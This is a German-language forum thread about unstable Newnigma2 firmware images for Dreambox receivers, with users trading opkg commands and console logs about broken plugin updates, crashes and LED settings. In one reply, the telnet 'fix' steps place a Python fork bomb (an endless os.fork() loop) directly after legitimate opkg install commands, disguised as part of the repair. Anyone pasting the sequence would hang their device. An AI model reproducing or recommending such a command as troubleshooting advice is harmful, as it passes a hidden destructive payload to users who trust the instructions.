Sammelthread für unstable images DM8000/DM800/DM500HD ab 19.05.2010

This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

  • Heute unstable Update DM8000. Total error auf/in Softwareverwaltung.
    Error auf alles,Softwareupdate usw. keine Pakete aufrufen kein gar nichts in der Softwareverwaltung.Überall "ERROR" crash


    kallee :D

    The post was edited 2 times, last by kallee ().

  • Das 8k iss gleich fertig mit dem neubauen.

    Per Telnet -> opkg update
    -> opkg install --force-overwrite --force-reinstall enigma2-plugin-newnigma2-installer
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Danke nightmann

    Original von nightmann
    Original von Gerald Z
    SystemWerkzeuge – Systemeinstellungen= GreenScreen Crash


    Bitte wieder unsere sleeptimer Ergänzung zum dmm sleeptimer Plugin installieren!

    opkg install enigma2-plugin-newnigma2-sleeptimer


    das war die lösung. prima :thumbsup:
  • habe heute das update gemacht. cd-info und youtubeplayer lassen sich nicht aktuallisieren, auch nicht mit force-overwrite, deinstallieren auch nicht möglich, scheinen weiter im Softwaremanager zur Aktuallisierung auf, update über die GUI: 1 Pakekt installiert mit 1 Fehler

    über telnet überprüft, nicht installiert (GUI-Neustart gemacht)

    die folgenden Fehlermeldungen kamen auch gleich beim update, das sind nur weitere Versuche

    Source Code

    1. root@dm800:~# opkg update
    2. Downloading http://feed.newnigma2.to/unstable/dm800/Packages.gz
    3. Inflating http://feed.newnigma2.to/unstable/dm800/Packages.gz
    4. Updated list of available packages in /var/lib/opkg/official
    5. Downloading http://feed.newnigma2.to/picons/lcd/Packages.gz
    6. Inflating http://feed.newnigma2.to/picons/lcd/Packages.gz
    7. Updated list of available packages in /var/lib/opkg/piconlcd
    8. Downloading http://feed.newnigma2.to/picons/skin/Packages.gz
    9. Inflating http://feed.newnigma2.to/picons/skin/Packages.gz
    10. Updated list of available packages in /var/lib/opkg/piconskin
    11. Downloading http://feed.newnigma2.to/picons/skinhd/Packages.gz
    12. Inflating http://feed.newnigma2.to/picons/skinhd/Packages.gz
    13. Updated list of available packages in /var/lib/opkg/piconskinhd
    14. Downloading http://feed.newnigma2.to/unstable/emu/Packages.gz
    15. Inflating http://feed.newnigma2.to/unstable/emu/Packages.gz
    16. Updated list of available packages in /var/lib/opkg/softcammipsel
    17. root@dm800:~# opkg install enigma2-plugin-extensions-cdinfo
    18. Installing enigma2-plugin-extensions-cdinfo (experimental-cvs20100914-r0) to flash...
    19. Downloading http://feed.newnigma2.to/unstable/dm800/enigma2-plugin-extensions-cdinfo_experimental-cvs20100914-r0_dm800.ipk
    20. ncurses: unsatisfied recommendation for ncurses-terminfo
    21. Collected errors:
    22. * ERROR: Cannot satisfy the following dependencies for enigma2-plugin-extensions-cdinfo:
    23. * libiso9660-7 (>= 0.81) * libcdio-cdda0 (>= 0.81) * libcdio-paranoia0 (>= 0.81) *
    24. * Cannot find package enigma2-plugin-extensions-cdinfo.
    25. root@dm800:~# opkg install enigma2-plugin-extensions-cdinfo
    26. Installing enigma2-plugin-extensions-cdinfo (experimental-cvs20100914-r0) to flash...
    27. Downloading http://feed.newnigma2.to/unstable/dm800/enigma2-plugin-extensions-cdinfo_experimental-cvs20100914-r0_dm800.ipk
    28. ncurses: unsatisfied recommendation for ncurses-terminfo
    29. Collected errors:
    30. * ERROR: Cannot satisfy the following dependencies for enigma2-plugin-extensions-cdinfo:
    31. * libiso9660-7 (>= 0.81) * libcdio-cdda0 (>= 0.81) * libcdio-paranoia0 (>= 0.81) *
    32. * Cannot find package enigma2-plugin-extensions-cdinfo.
    33. root@dm800:~# opkg install --force-overwrite --force-reinstall enigma2-plugin-ex
    34. tensions-youtubeplayer
    35. Installing enigma2-plugin-extensions-youtubeplayer (experimental-cvs20100914-r0) to flash...
    36. Downloading http://feed.newnigma2.to/unstable/dm800/enigma2-plugin-extensions-youtubeplayer_experimental-cvs20100914-r0_dm800.ipk
    37. python-core: unsatisfied recommendation for python-readline
    38. Collected errors:
    39. * ERROR: Cannot satisfy the following dependencies for enigma2-plugin-extensions-youtubeplayer:
    40. * python-zopeinterface * python-elementtree *
    41. * Cannot find package enigma2-plugin-extensions-youtubeplayer.
    42. root@dm800:~# opkg install --force-overwrite --force-reinstall enigma2-plugin-ex
    43. tensions-cdinfo
    44. Installing enigma2-plugin-extensions-cdinfo (experimental-cvs20100914-r0) to flash...
    45. Downloading http://feed.newnigma2.to/unstable/dm800/enigma2-plugin-extensions-cdinfo_experimental-cvs20100914-r0_dm800.ipk
    46. ncurses: unsatisfied recommendation for ncurses-terminfo
    47. Collected errors:
    48. * ERROR: Cannot satisfy the following dependencies for enigma2-plugin-extensions-cdinfo:
    49. * libiso9660-7 (>= 0.81) * libcdio-cdda0 (>= 0.81) * libcdio-paranoia0 (>= 0.81) *
    50. * Cannot find package enigma2-plugin-extensions-cdinfo.
    51. root@dm800:~# opkg remove enigma2-plugin-extensions-cdinfo
    52. No packages removed.
    53. root@dm800:~# opkg remove enigma2-plugin-extensions-youtubeplayer
    54. No packages removed.
    55. root@dm800:~# opkg list_installed | grep youtube
    56. root@dm800:~# opkg list_installed | grep cdinfo
    57. root@dm800:~#
    Display All

    The post was edited 2 times, last by Fred Bogus Trumper ().

  • Muss noch etwas anmerken
    daß -- kernel-module-cdfs_2.6.18-r24.0_dm8000.ipk -- in der 8000 schon einige Zeit in der Pakete-Übersicht auf aktualisieren steht. Es läßt sich aber nichts aktualisieren!!


    kallee

    The post was edited 1 time, last by kallee ().

  • Original von dhwz
    Irgendwie ist die blaue LED bei mir viel zu dunkel (Standby und auch im Betrieb), warum gibt es keine Einstellmöglichkeit damit man sich die Helligkeitsstufe selbst festlegen kann?


    hallo,

    habe das gleiche problem mit dem blauen led, kann nirgens finden wie man es deaktiviert unter expert einstellungen konnte man die helligkeiten runter fahren.
    kann jemand tipps geben das ipk von led control hilft auch nicht weiter habe nun das image unstable vom 13.9.10 auf meiner dm 8000

    gruß
    chv
  • Original von Fred Bogus Trumper
    habe heute das update gemacht. cd-info und youtubeplayer lassen sich nicht aktuallisieren


    Also wenn ich den youtubeplayer installiere dann benötige ich die Pakete gar nicht, die du da als Fehler bekommst.

    root@dm7025:~# opkg install enigma2-plugin-extensions-youtubeplayer
    Installing enigma2-plugin-extensions-youtubeplayer (experimental-cvs20100914-r0a) to flash...
    Downloading feed.newnigma2.to/unstable/dm7…-cvs20100914-r0a_dm7025.i pk
    Installing enigma2-plugin-extensions-vlcplayer (experimental-cvs20100914-r0a) to flash...
    Downloading feed.newnigma2.to/unstable/dm7…vs20100914-r0a_dm7025.ipk
    Installing python-gdata (1.2.4-r0a) to flash...
    Downloading feed.newnigma2.to/unstable/dm7…data_1.2.4-r0a_mipsel.ipk
    Installing python-misc (2.6.4-ml8.2a) to flash...
    Downloading feed.newnigma2.to/unstable/dm7…c_2.6.4-ml8.2a_mipsel.ipk
    Installing python-textutils (2.6.4-ml8.2a) to flash...
    Downloading feed.newnigma2.to/unstable/dm7…s_2.6.4-ml8.2a_mipsel.ipk
    Configuring python-gdata
    Configuring python-textutils
    Configuring enigma2-plugin-extensions-youtubeplayer
    Configuring enigma2-plugin-extensions-vlcplayer
    Configuring python-misc